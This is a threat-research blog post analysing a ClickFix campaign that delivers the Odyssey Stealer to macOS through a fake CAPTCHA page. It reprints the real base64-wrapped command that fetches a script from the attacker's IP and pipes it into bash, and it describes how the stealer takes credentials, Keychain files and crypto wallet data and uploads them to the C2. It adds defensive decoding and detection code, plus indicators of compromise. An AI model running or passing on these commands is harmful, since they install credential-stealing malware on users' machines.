Odyssey Stealer: ClickFix Malware Attacks macOS Users for Credentials and Crypto Wallet Details

Prashant Kumar
A few months back, X-Labs released research on how a ClickFix attack delivered malware to Windows systems. Since then, X-Labs researchers have been tracking a phishing campaign that turns the same ClickFix technique against macOS, delivering malware designed to steal credentials and cryptocurrency wallet data.
The attack uses a ClickFix lure: the attacker builds a fake CAPTCHA verification page that instructs the victim to copy a command and run it themselves. The technique blends phishing with social engineering and, in this campaign, executes without dropping a binary on the system. The fake CAPTCHA page identifies the visitor's operating system and serves instructions tailored to it.
Odyssey Stealer technical analysis
Browsing the URL “hxxps://tradingviewen[.]com” from either a Windows or a macOS system lands on a page that demands CAPTCHA verification and asks the user to perform a series of steps.
Webpage after browsing on Windows system:
Fig. 1 - Windows instructions
Webpage after browsing on macOS system:
Fig. 2 - macOS instructions
Following the instructions and pasting the clipboard contents into a terminal yields the following command:
- echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash
The Base64 string decodes to a one-liner that fetches a script from the attacker's server and pipes it straight into bash; nohup and the trailing ampersand detach it from the terminal so it keeps running even if the user closes the window:
- curl -s hxxp://45.146.130[.]131/d/vipx14350 | nohup bash &
The URL “hxxp://45.146.130[.]131/d/vipx14350” serves a heavily obfuscated AppleScript, which we dissect later in this post.
Browsing “hxxps://tradingviewen[.]com” directly confirms that the page fingerprints the visitor's operating system and shows different instructions for macOS and Windows. The command placed on the clipboard differs accordingly:
1- On Windows, the instructions are Win + R, type PowerShell, click copy, then paste (Ctrl + V). In this campaign the clipboard holds only a generic Windows command string, not a malicious payload.
2- On macOS, the instructions are Command + Space, open Terminal, click copy, then paste into the terminal. Here the clipboard holds the malicious Base64-wrapped command shown above, which bash decodes and executes.
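The pasted command is small enough to triage automatically before anyone runs it. The following is an added example (not code from the original post or from Forcepoint) that unwraps an `echo <base64> | base64 -d | bash` wrapper, decodes the payload, and flags the fetch-and-execute pattern; the sample command is the exact one the fake CAPTCHA page placed on the clipboard, everything else (the function and class names, the regexes) is this example's own construction:

```python
"""Decode and triage a ClickFix-style one-liner.

Added example (not code from the original post or from Forcepoint): given a
command string pasted into a terminal, it unwraps "echo <b64> | base64 -d | bash",
decodes the payload, and flags the download-and-execute pattern. The sample
command below is the one shown in the post; everything else is constructed.
"""
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass, field

# Matches `echo "<base64>" | base64 -d | bash` (also -D on macOS, sh/zsh).
B64_STAGE = re.compile(
    r"""echo\s+["']?(?P<b64>[A-Za-z0-9+/=]+)["']?\s*\|\s*base64\s+(?:-d|-D|--decode)\s*\|\s*(?:bash|sh|zsh)"""
)
# Download-and-run: curl/wget output piped into an interpreter.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(?:nohup\s+)?(?:bash|sh|zsh|osascript)\b")
URL = re.compile(r"https?://[^\s'\"|]+")


@dataclass
class Verdict:
    suspicious: bool
    reasons: list[str] = field(default_factory=list)
    decoded: str | None = None
    urls: list[str] = field(default_factory=list)


def unwrap_base64_stage(cmd: str) -> str | None:
    """Return the decoded payload of an echo|base64 -d|bash wrapper, or None."""
    m = B64_STAGE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def triage(cmd: str, max_depth: int = 3) -> Verdict:
    """Peel nested base64 wrappers (up to max_depth) and flag fetch-and-execute behaviour."""
    v = Verdict(suspicious=False)
    current = cmd
    for _ in range(max_depth):
        inner = unwrap_base64_stage(current)
        if inner is None:
            break
        v.reasons.append("base64-encoded command piped into a shell")
        v.decoded = inner
        current = inner
    if FETCH_EXEC.search(current):
        v.reasons.append("remote script piped directly into an interpreter")
    if "nohup" in current:
        v.reasons.append("nohup used to detach from the terminal")
    v.urls = URL.findall(current)
    if any(re.match(r"https?://\d+\.\d+\.\d+\.\d+", u) for u in v.urls):
        v.reasons.append("download from a bare IP address")
    v.suspicious = bool(v.reasons)
    return v


# The exact command the fake CAPTCHA page placed on the clipboard (from the post).
CLICKFIX_CMD = (
    'echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" '
    "| base64 -d | bash"
)

if __name__ == "__main__":
    verdict = triage(CLICKFIX_CMD)
    print("decoded :", verdict.decoded)
    print("urls    :", verdict.urls)
    for reason in verdict.reasons:
        print("flag    :", reason)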
Dissecting the AppleScript payload
When the decoded command runs in the terminal, the script prompts the user for their account password, which it then uses to gather sensitive data from the Mac and send it to the remote server.
Downloading the payload and taking a first look, we found an AppleScript (.scpt) that is executed automatically via “osascript”. The script is padded with randomly generated strings for obfuscation, which makes analysis harder; after stripping the junk strings we were able to analyse the behaviour of the code.
The script first creates a working directory with “mkdir”, specifically under “/tmp”.
Fig. 3 - Beginning of script & creating directory
The script's main purpose is to harvest browser extension data, cryptocurrency wallets, and saved usernames and passwords.
General file collection from Desktop and Documents
The image below shows the script collecting files from the user's Desktop and Documents folders by extension, including .txt, .pdf, .docx, .key and others.
Beyond these, the script also gathers Safari cookies, Apple Notes and Keychain files.
Fig. 4 - File collection
Crypto wallet detection in Firefox and Chromium-based browser enumeration
The script targets Firefox and Chrome, copying cookies, saved logins, form history and the associated encryption keys into the temporary working directory, as shown in Fig. 5 and 6.
It also handles Chromium-based browsers such as Google Chrome, Brave, Microsoft Edge and Opera: it enumerates user profiles and extracts cookies, autofill data, login credentials and extension settings. The point to focus on for Chromium-based browsers is the handling of extensions matching known crypto wallets such as Electrum, Exodus, Litecoin, Wasabi and many more.
For those extensions it copies the Local Storage and IndexedDB directories, so any wallet-related data stored by the extension is exfiltrated as well.
Fig. 5 - Firefox-based data collection
Fig. 6 - Chromium-based Chrome browser enumeration
The data exfiltration process
After collecting the data, the script sets up the exfiltration step: it packages everything into a ZIP archive saved as /tmp/out.zip, and its upload function sends the archive to “hxxp://45.146.130[.]131/log” with a curl command.
Fig. 7 - Data exfiltration
Browsing to 45.146.130[.]131 directly brings up the login page of the Odyssey Stealer control panel, through which the attacker presumably views the harvested data.
Fig. 8 - Odyssey stealer login page
Final cleanup after data exfiltration
Once the data has been sent to the server, the script deletes the ZIP archive and its working directory under /tmp to remove traces of its activity, which complicates forensic analysis.
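The archive, upload and cleanup steps described in the last two sections are a tight sequence that can be correlated in process telemetry. The following is an added example (not code from the original post or from Forcepoint) that walks constructed EDR-style process events and reports an osascript process whose children zip a directory to /tmp, POST the archive with curl, and then delete it. The record shape, the function names, the working-directory name /tmp/work and the script path are assumptions made for the example; /tmp/out.zip and the /log endpoint come from the post.

```python
"""Correlate the stealer's archive -> upload -> cleanup chain in process events.

Added example, not from the original post or Forcepoint. The ProcEvent record
shape is an assumption about what an EDR would provide; the sample events are
constructed to mirror the behaviour described in the post. Only /tmp/out.zip and
the /log endpoint come from the post; /tmp/work and /tmp/stage.scpt are invented.
"""
from __future__ import annotations

import re
import shlex
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # seconds since epoch
    pid: int       # unique per exec in this sample
    ppid: int
    name: str
    cmdline: str


ZIP_RE = re.compile(r"^(?:/usr/bin/)?zip$")
CURL_RE = re.compile(r"^(?:/usr/bin/)?curl$")
RM_RE = re.compile(r"^(?:/bin/)?rm$")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def _args(cmd: str) -> list[str]:
    try:
        return shlex.split(cmd)
    except ValueError:
        return cmd.split()


def detect_stealer_chain(events: list[ProcEvent], window_s: int = 600) -> list[dict]:
    """One finding per osascript process whose subtree shows zip-to-/tmp,
    curl upload of that archive, and (optionally) rm of /tmp paths, in order,
    with the upload no more than window_s seconds after the osascript start."""
    by_pid = {e.pid: e for e in events}
    children: dict[int, list[ProcEvent]] = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)

    def subtree(root: int) -> list[ProcEvent]:
        out, stack = [], [root]
        while stack:
            pid = stack.pop()
            if pid in by_pid:
                out.append(by_pid[pid])
            stack.extend(c.pid for c in children[pid])
        return sorted(out, key=lambda e: e.ts)

    findings = []
    for root in (e for e in events if e.name == "osascript"):
        archive = upload = wipe = None
        for e in subtree(root.pid):
            a = _args(e.cmdline)
            if not a:
                continue
            if archive is None and ZIP_RE.match(a[0]):
                # zip's first non-option argument is the archive it writes
                targets = [x for x in a[1:] if not x.startswith("-")]
                if targets and targets[0].startswith("/tmp/") and targets[0].endswith(".zip"):
                    archive = (e, targets[0])
            elif archive and upload is None and CURL_RE.match(a[0]):
                m = URL_RE.search(e.cmdline)
                if m and archive[1] in e.cmdline:
                    upload = (e, m.group(0))
            elif upload and wipe is None and RM_RE.match(a[0]):
                if any(x.startswith("/tmp/") for x in a[1:]):
                    wipe = e
        if archive and upload and upload[0].ts - root.ts <= window_s:
            findings.append({
                "root_pid": root.pid,
                "archive": archive[1],
                "exfil_url": upload[1],
                "cleanup": wipe is not None,
            })
    return findings


# Constructed sample telemetry: a Terminal session running the staged script,
# plus unrelated zip/curl activity from the same session that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(1000, 400, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(1001, 500, 400, "bash", "bash"),
    ProcEvent(1002, 501, 500, "osascript", "osascript /tmp/stage.scpt"),      # path invented
    ProcEvent(1003, 502, 501, "mkdir", "mkdir -p /tmp/work"),                 # dir name invented
    ProcEvent(1040, 503, 501, "zip", "zip -r /tmp/out.zip /tmp/work"),
    ProcEvent(1041, 504, 501, "curl", "curl -s -F file=@/tmp/out.zip http://45.146.130.131/log"),
    ProcEvent(1042, 505, 501, "rm", "rm -rf /tmp/work /tmp/out.zip"),
    ProcEvent(1100, 600, 400, "zip", "zip -r /Users/alice/backup.zip Documents"),
    ProcEvent(1101, 601, 400, "curl", "curl -s https://example.com/"),
]

if __name__ == "__main__":
    for f in detect_stealer_chain(SAMPLE_EVENTS):
        print(f)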
Conclusion
In this post we covered how the ClickFix attack has expanded from Windows targets to macOS ones. Combined with obfuscation, this terminal-based social engineering lets attackers bypass traditional detection mechanisms.
The attacker built a fake CAPTCHA page that checks the visitor's OS before delivering the malware. When the expected OS is detected, the page walks the user through a series of steps that trigger execution: the pasted command runs “base64 -d | bash”, which decodes the embedded string and executes it in bash. The decoded command downloads and runs a malicious AppleScript (.scpt) that collects crypto wallet data, browser extensions, cookies, sessions, Keychain files, usernames and passwords from the system. The captured data is archived to “/tmp/out.zip” and then exfiltrated to the C2.
The takeaway from this analysis: attackers combine phishing and social engineering to bypass common detection methods and exfiltrate data without ever dropping a binary on the system.
Protection Statement
- Stage 2 (Lure) – Malicious URLs associated with these attacks are identified and blocked.
- Stage 5 (Dropper File) – The malicious AppleScript (.scpt) has been added to the Forcepoint malicious database and is blocked.
- Stage 6 (Call Home) – C2 servers are categorized under the security category and blocked.
NGFW Protection Statement
The phishing site is detected with fingerprint "File-Text_Information-Stealer-Using-Fake-Browser-Dialogs" since dynup 1845.
IOCs
Indicator | Type |
hxxps://tradingviewen[.]com | Initial URL |
43917e7dab6e09087de24f7878b9c1c1a7ec1968 | AppleScript (.scpt) |
hxxps://45.146.130[.]131/login | URL |
hxxps://45.146.130[.]131/otherassets/plist/ | URL |
hxxps://45.146.130[.]131/d/vipx14350 | URL |
hxxps://45.146.130[.]131/d/dayderry13027/ | URL |
hxxps://45.146.130[.]131/api/v1/bot/actions/ | URL |
hxxps://45.146.130[.]131/api/v1/bot/repeat/ | URL |
hxxps://45.146.130[.]131/otherassets/ | URL |
hxxps://45.146.130[.]131/api/v1/bot/joinsystem | URL |
hxxps://45.146.130[.]131/d/leopold51865/ | URL |
hxxps://45.146.130[.]131/otherassets/socks/ | URL |
hxxps://45.146.130[.]131/otherassets/ledger.zip | URL |
hxxps://45.146.130[.]131/log | URL |
hxxps://45.146.130[.]131/d/leopold66209 | URL |
45.146.130[.]131 | C2 |
Prashant Kumar serves as a Security Researcher for X-Labs Threat Research Content. He spends his time researching web and email-based cyberattacks, with a particular focus on URL research, email security and analyzing malware campaigns.